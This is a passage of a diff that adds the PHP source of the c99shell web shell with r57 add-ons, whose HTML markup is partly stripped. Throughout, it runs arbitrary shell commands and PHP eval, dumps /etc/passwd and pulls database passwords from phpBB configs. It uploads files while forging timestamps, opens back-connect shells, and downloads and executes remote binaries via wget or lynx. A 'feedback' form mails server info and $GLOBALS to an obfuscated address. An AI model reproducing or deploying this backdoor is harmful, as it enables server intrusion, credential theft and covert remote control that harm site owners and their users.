    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ?.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + + + + + + + ?> + + + + + +

    :: Bind Functions By r57 ::

    +
    +
    +
    +Bind With Backd00r Burner


    +
    +
    + + + Back-Connection :
    Ip (default is your ip) :

    Port:


    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    + +
    +
    + + + + + + + + + + + + +

    :: File Stealer Function Ripped fRom Tontonq 's File Stealer ... ::

    +
    Safe_Mode Bypass +
    + +
    + "size=84> + + +
    + + + + + + + + + + + +
    + +
    +
    +
    + + Dosyanin Adresi ? =

    +Nereya Kaydolcak? = ">

    + +
    +


    + + + + +
    + +
    +
    + + + + + + + + + + + + +Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...
    "; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "Processes:
    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    "; 
    +   $v = explode("|",$r); 
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
